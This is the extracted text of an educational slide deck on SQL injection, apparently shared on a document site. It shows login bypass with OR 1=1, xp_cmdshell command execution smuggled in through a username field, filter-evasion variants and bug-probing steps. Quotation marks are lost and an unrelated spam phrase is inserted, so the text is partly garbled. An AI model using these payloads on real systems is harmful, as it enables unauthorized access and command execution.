优秀it犯罪案例解析：我如何偷走你的数据How Did I Steal Your Database.pptxVIP

How Did I Steal Your DatabaseMostafa Siraj@mostafasiraj超级清纯美眉AgendaNoooo, it kills suspenseHacking websites is ILLEGALThis presentation is meant for educational purposes ONLYOnly use this stuff on YOUR website and YOUR accountDISCLAIMERSQL InjectionWhat is it? The application dynamically generates an SQL query based on user input, but it does not sufficiently prevent that input from modifying the intended structure of the query. SQL Injection Example, Bypassing LogonOriginal SQL QueryString sqlQuery = SELECT * FROM user WHERE name = + username + AND pass= + password + “…..Setting username to Mostafa password to OR 1= 1 producesSELECT * FROM user WHERE name = Mostafa AND pass= OR 1=1Attacker is logged on without AuthenticationDepending on the DB, an attacker can access the operating systemMS SQL Server: Execute OS command xp_cmdshellSet username to ; exec master.dbo.xp_cmdshell dir;-- producesSELECT * FROM user WHERE name=; exec master.dbo.xp_cmdshell dir; --Note: dir list directory contentNot only your web app and DB are at riskOriginal: SELECT * FROM user WHERE name=; exec master.dbo.xp_cmdshell dir; --Defender: Disallow double quotes:Attacker: SELECT * FROM user WHERE name=; exec master.dbo.xp_cmdshell dir; --Defender: Filter out string “xp_cmdshell”Attacker: ;declare @a varchar(1000);set @a = master.dbo.xp_ + cmdshell dir;exec (@a);--Defender: Filter out “xp”, “cmd”, “shell”, ….Attacker: ;declare @a varchar(1000);set @a = reverse(rid llehsdmc_px.obd.retsam);exec (@a);--Lets play Hide and SeekFinding SQL Injection BugsFinding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotation and observe the result Identify the database (e.g.Oracle: ‘||’FOOMS-SQL: ‘+’FOOMySQL: ‘ ‘FOO [note the space btw the 2 quotes]Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %Finding SQL Injection Bugs For numeric data, if the